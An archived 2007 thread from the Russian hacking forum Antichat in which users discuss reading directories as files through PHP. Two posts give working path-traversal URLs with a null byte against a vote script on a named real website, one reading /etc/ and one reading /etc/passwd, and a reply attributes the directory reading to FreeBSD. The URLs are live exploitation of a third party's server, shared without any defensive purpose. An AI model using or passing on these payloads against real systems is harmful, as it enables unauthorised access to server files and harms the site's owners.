Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   чтение файла каталога (https://forum.antichat.xyz/showthread.php?t=55223)

Scipio 07.12.2007 17:00
чтение файла каталога
 
вопрос собственно вот какой: можно ли как нибудь средствами php читать файл каталога, как например вот здесь:
http://www.gerz.ru/engine/ajax/vote.php?vote_action=results&vote_skin=../../../../../../../../../../../etc/%00

там вроде сервер ngnix, может это особенность сервера?

BlasT 07.12.2007 17:07
а тут не средствами php?

Scipio 07.12.2007 17:12
Здесь средствами php конечно, я как понял функция file_get_contens это выдает, но почему то где бы я не пробовал читать файл-каталога, у меня не получается

BlasT 07.12.2007 17:14
ну значит там нету прав для чтения файла каталога а тут есть =\

Macro 07.12.2007 17:15
Это у нас freebsd и там это стандартная ситуация. Файлы тоже читаются
http://www.gerz.ru/engine/ajax/vote.php?vote_action=results&vote_skin=../../../../../../../../../../../etc/passwd%00

Scipio 07.12.2007 17:19
Цитата:
Сообщение от Macro
Это у нас freebsd и там это стандартная ситуация. Файлы тоже читаются
http://www.gerz.ru/engine/ajax/vote.php?vote_action=results&vote_skin=../../../../../../../../../../../etc/passwd%00
Не ну с файлами то понятно, да насколько помню там freebsd, значит это особенность оси?, спасибо

Macro 07.12.2007 17:21
Цитата:
Сообщение от Scipio
Не ну с файлами то понятно, да насколько помню там freebsd, значит это особенность оси?, спасибо
Да, это особенность freebsd, на других unix'ах вроде такого нет, не слышал, по крайней мере.


Время: 00:28